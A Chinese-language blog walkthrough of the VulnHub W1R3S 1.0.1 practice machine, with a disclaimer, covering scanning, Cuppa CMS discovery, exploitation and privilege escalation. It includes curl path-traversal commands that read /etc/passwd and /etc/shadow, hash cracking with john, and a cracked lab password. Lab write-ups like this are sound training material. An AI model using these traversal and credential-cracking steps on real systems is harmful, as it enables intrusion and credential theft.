W1R3S-1b靶机详解


靶机基本信息

W1R3S: 1.0.1 ~ VulnHub

靶机下载链接见:

https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip

下载好之后,用vmware打开即可,将网络适配器设置为NAT模式

主机发现

也可以使用nmap进行主机发现

信息收集

简单的全端口扫描:

详细的扫描结果:

从扫描的结果可以看出,存在ftp弱口令

目录扫描:

访问http://192.168.255.187/administrator/installation/

发现是Title[Cuppa CMS]框架!CuppaCMS是一套内容管理系统(CMS)!

使用whatweb进行指纹识别:

漏洞发现

谷歌搜索引擎搜索:Cuppa CMS exploit
EXP的地址链接:https://www.exploit-db.com/exploits/25971

漏洞利用

使用curl工具:

–data-urlencode:在新版本的CURL中,提供了新的选项 --data-urlencode,通过该选项提供的参数会自动转义特殊字符。

命令:curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.255.187/administrator/alerts/alertConfigField.php

关键信息结果:

命令:``curl -s --data-urlencode urlConfig=…/…/…/…/…/…/…/…/…/etc/shadow http://192.168.255.187/administrator/alerts/alertConfigField.php `

关键信息结果:

将shadow文件内容(圈出来的)复制到hash.txt中, 然后使用john命令进行破解: sudo john hash.txt

爆破出结果:用户名:w1r3s
密码:computer

ssh登录:

权限提升

使用命令sudo -l查看当前用户的权限, 可以发现是全权限

是全权限, 可以直接执行sudo su获取root用户权限

读取root文件有那些,发现flag.txt,读取文件内容

整体来说,这个靶机难度较为简单。

免责声明:本文章涉及的知识和技能仅用于学习研究,如有用于非法途径或未被授权的真实网络环境,所造成的后果及连带责任自行承担,与本文作者无关,倡导把安全知识和技能用于正当、正规、正义的途径。


文章作者: 阿浩
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 阿浩 !
评论
  目录